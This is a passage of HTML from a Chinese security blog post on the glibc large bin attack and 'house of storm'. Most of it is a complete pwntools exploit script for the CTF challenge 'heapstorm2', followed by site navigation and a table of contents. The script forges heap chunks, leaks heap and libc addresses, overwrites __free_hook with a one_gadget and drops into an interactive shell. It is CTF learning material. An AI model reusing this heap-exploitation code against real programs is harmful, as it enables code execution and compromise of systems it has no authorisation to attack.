class="keyword">def</span> <span class="title">add</span>(<span class="params">size</span>):</span></span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;Command: &#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="string">&#x27;1&#x27;</span>)</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;Size: &#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="built_in">str</span>(size))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">update</span>(<span class="params">index,content</span>):</span></span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;Command: &#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="string">&#x27;2&#x27;</span>)   </span><br><span class="line">    sh.recvuntil(<span class="string">&quot;Index: &quot;</span>)</span><br><span class="line">    sh.sendline(<span class="built_in">str</span>(index))</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;Size: &#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="built_in">str</span>(<span class="built_in">len</span>(content)))</span><br><span class="line">    sh.recvuntil(<span class="string">&quot;Content: &quot;</span>)</span><br><span class="line">    sh.send(content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">free</span>(<span class="params">index</span>):</span></span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;Command: &#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="string">&#x27;3&#x27;</span>) </span><br><span class="line">    sh.recvuntil(<span class="string">&quot;Index: &quot;</span>)</span><br><span class="line">    sh.sendline(<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params">index</span>):</span></span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;Command: &#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="string">&#x27;4&#x27;</span>)</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;Index: &#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line">i=<span class="number">1</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">pwn</span>():</span></span><br><span class="line">    <span class="keyword">while</span>  <span class="literal">True</span>:</span><br><span class="line">        <span class="comment">#sh=process(&#x27;./heapstorm2&#x27;)</span></span><br><span class="line">        <span class="comment">#sh=remote(&#x27;node4.buuoj.cn&#x27;,29023)</span></span><br><span class="line">        <span class="comment">#gdb.attach(sh,&quot;b main&quot;)</span></span><br><span class="line">        add(<span class="number">0x18</span>)<span class="comment">#0</span></span><br><span class="line">        add(<span class="number">0x508</span>)<span class="comment">#1</span></span><br><span class="line">        update(<span class="number">1</span>,<span class="string">&#x27;s&#x27;</span>*<span class="number">0x4f0</span>+p64(<span class="number">0x500</span>))</span><br><span class="line">        add(<span class="number">0x18</span>)<span class="comment">#2</span></span><br><span class="line">        add(<span class="number">0x18</span>)<span class="comment">#3</span></span><br><span class="line">        add(<span class="number">0x508</span>)<span class="comment">#4</span></span><br><span class="line">        update(<span class="number">1</span>,<span class="string">&#x27;s&#x27;</span>*<span class="number">0x4f0</span>+p64(<span class="number">0x500</span>))</span><br><span class="line">        add(<span class="number">0x18</span>)<span class="comment">#5</span></span><br><span class="line">        add(<span class="number">0x18</span>)<span class="comment">#6</span></span><br><span class="line"></span><br><span class="line">        free(<span class="number">1</span>)</span><br><span class="line">        update(<span class="number">0</span>,<span class="string">&#x27;s&#x27;</span>*(<span class="number">0x18</span>-<span class="number">12</span>))</span><br><span class="line">        add(<span class="number">0x18</span>)<span class="comment">#1</span></span><br><span class="line">        add(<span class="number">0x4d8</span>)<span class="comment">#7 overlap</span></span><br><span class="line">        free(<span class="number">1</span>)</span><br><span class="line">        free(<span class="number">2</span>)</span><br><span class="line">        <span class="comment"># add(0x18)</span></span><br><span class="line">        <span class="comment"># add(0x4d8)</span></span><br><span class="line">        add(<span class="number">0x38</span>)<span class="comment">#1</span></span><br><span class="line">        add(<span class="number">0x4e8</span>)<span class="comment">#2</span></span><br><span class="line"></span><br><span class="line">        update(<span class="number">4</span>,<span class="string">&#x27;s&#x27;</span>*<span class="number">0x4f0</span>+p64(<span class="number">0x500</span>))</span><br><span class="line">        free(<span class="number">4</span>)</span><br><span class="line">        update(<span class="number">3</span>,<span class="string">&#x27;s&#x27;</span>*(<span class="number">0x18</span>-<span class="number">12</span>))</span><br><span class="line">        add(<span class="number">0x18</span>)<span class="comment">#4</span></span><br><span class="line">        add(<span class="number">0x4d8</span>)<span class="comment">#8</span></span><br><span class="line">        free(<span class="number">4</span>)</span><br><span class="line">        free(<span class="number">5</span>)</span><br><span class="line">        add(<span class="number">0x48</span>)<span class="comment">#4</span></span><br><span class="line"></span><br><span class="line">        free(<span class="number">2</span>)</span><br><span class="line">        add(<span class="number">0x4e8</span>)<span class="comment">#2</span></span><br><span class="line">        free(<span class="number">2</span>)</span><br><span class="line"></span><br><span class="line">        <span class="comment">#unsorted bin</span></span><br><span class="line">        fake_chunk=<span class="number">0x13370800</span>-<span class="number">0x20</span></span><br><span class="line">        p1=p64(<span class="number">0</span>)*<span class="number">2</span>+p64(<span class="number">0</span>)+p64(<span class="number">0x4f1</span>)</span><br><span class="line">        p1+=p64(<span class="number">0</span>)+p64(fake_chunk)</span><br><span class="line">        update(<span class="number">7</span>,p1)</span><br><span class="line"></span><br><span class="line">        <span class="comment">#large bin</span></span><br><span class="line">        p=p64(<span class="number">0</span>)*<span class="number">4</span>+p64(<span class="number">0</span>)+p64(<span class="number">0x4e1</span>)</span><br><span class="line">        p+=p64(<span class="number">0</span>)+p64(fake_chunk+<span class="number">8</span>)</span><br><span class="line">        p+=p64(<span class="number">0</span>)+p64(fake_chunk-<span class="number">0x18</span>-<span class="number">5</span>)</span><br><span class="line">        update(<span class="number">8</span>,p)</span><br><span class="line">        add(<span class="number">0x48</span>)<span class="comment">#2</span></span><br><span class="line">        p2=p64(<span class="number">0</span>)*<span class="number">5</span>+p64(<span class="number">0x13377331</span>)</span><br><span class="line">        p2+=p64(<span class="number">0x13370800</span>)</span><br><span class="line">        update(<span class="number">2</span>,p2)</span><br><span class="line">        p3=p64(<span class="number">0</span>)*<span class="number">3</span>+p64(<span class="number">0x13377331</span>)+p64(<span class="number">0x13370800</span>)</span><br><span class="line">        p3+=p64(<span class="number">0x1000</span>)+p64(fake_chunk+<span class="number">3</span>)+p64(<span class="number">8</span>)</span><br><span class="line">        update(<span class="number">0</span>,p3)</span><br><span class="line">        show(<span class="number">1</span>)</span><br><span class="line">        sh.recvuntil(<span class="string">&#x27;]: &#x27;</span>)</span><br><span class="line">        heap=u64(sh.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>))</span><br><span class="line">        <span class="built_in">print</span> <span class="built_in">hex</span>(heap)</span><br><span class="line">        p3=p64(<span class="number">0</span>)*<span class="number">3</span>+p64(<span class="number">0x13377331</span>)+p64(<span class="number">0x13370800</span>)</span><br><span class="line">        p3+=p64(<span class="number">0x1000</span>)+p64(heap+<span class="number">0x10</span>)+p64(<span class="number">8</span>)</span><br><span class="line">        update(<span class="number">0</span>,p3)</span><br><span class="line">        show(<span class="number">1</span>)</span><br><span class="line">        sh.recvuntil(<span class="string">&#x27;]: &#x27;</span>)</span><br><span class="line">        hook_base=u64(sh.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>))-<span class="number">0x58</span>-<span class="number">0x10</span></span><br><span class="line">        libc_base=hook_base-libc.symbols[<span class="string">&#x27;__malloc_hook&#x27;</span>]</span><br><span class="line">        <span class="built_in">print</span> <span class="built_in">hex</span>(libc_base)</span><br><span class="line">        free_hook=libc_base+libc.symbols[<span class="string">&#x27;__free_hook&#x27;</span>]</span><br><span class="line">        p3=p64(<span class="number">0</span>)*<span class="number">3</span>+p64(<span class="number">0x13377331</span>)+p64(<span class="number">0x13370800</span>)</span><br><span class="line">        p3+=p64(<span class="number">0x1000</span>)+p64(free_hook)+p64(<span class="number">0x8</span>)</span><br><span class="line">        update(<span class="number">0</span>,p3)</span><br><span class="line">        update(<span class="number">1</span>,p64(ogg[<span class="number">1</span>]+libc_base))</span><br><span class="line">        free(<span class="number">1</span>)</span><br><span class="line">        sh.interactive()</span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        sh = process(<span class="string">&#x27;./heapstorm2&#x27;</span>)</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            pwn()</span><br><span class="line">        <span class="keyword">except</span>:</span><br><span class="line">            sh.close()</span><br></pre></td></tr></table></figure>


    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/11/17/Fastbin-Attack/" rel="prev" title="Fastbin Attack">
      <i class="fa fa-chevron-left"></i> Fastbin Attack
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/11/26/off-by-null/" rel="next" title="off by null">
      off by null <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Large-Bin-Attack"><span class="nav-number">1.</span> <span class="nav-text">Large    Bin    Attack</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#largebin%E7%BB%93%E6%9E%84"><span class="nav-number">1.0.1.</span> <span class="nav-text">largebin结构</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Large-bin-Attack"><span class="nav-number">1.0.2.</span> <span class="nav-text">Large    bin     Attack</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#large-bin-arrack-%E9%AB%98%E7%BA%A7%E5%88%A9%E7%94%A8"><span class="nav-number">1.1.</span> <span class="nav-text">large bin arrack 高级利用</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#house-of-strom"><span class="nav-number">1.2.</span> <span class="nav-text">house of strom</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%AC%AC%E4%B8%80%E6%AD%A5-%E4%BC%AA%E9%80%A0%E5%A0%86"><span class="nav-number">1.2.0.1.</span> <span class="nav-text">第一步 伪造堆</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E6%B3%A8%E6%84%8F%EF%BC%9A%E6%8F%92%E5%85%A5%E7%9A%84chunk%E7%9A%84%E5%80%BC%E8%A6%81%E5%A4%A7%E4%BA%8E%E5%B8%83%E7%BD%AE%E7%9A%84largechun%E7%9A%84%E5%A4%A7%E5%B0%8F%EF%BC%88%E5%8D%B3%E6%8F%92%E5%9C%A8%E5%B8%83%E7%BD%AE%E7%9A%84kargechunk%E7%9A%84%E5%89%8D%E9%9D%A2%EF%BC%89"><span class="nav-number">1.2.0.1.1.</span> <span class="nav-text">注意：插入的chunk的值要大于布置的largechun的大小（即插在布置的kargechunk的前面）</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%AC%AC%E4%BA%8C%E6%AD%A5-%E7%94%B3%E8%AF%B7fake-chunk"><span class="nav-number">1.2.0.2.</span> <span class="nav-text">第二步 申请fake_chunk</span></a></li></ol></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">rootzhang</p>
  <div class="site-description" itemprop="description">我的博客</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">21</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">rootzhang</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
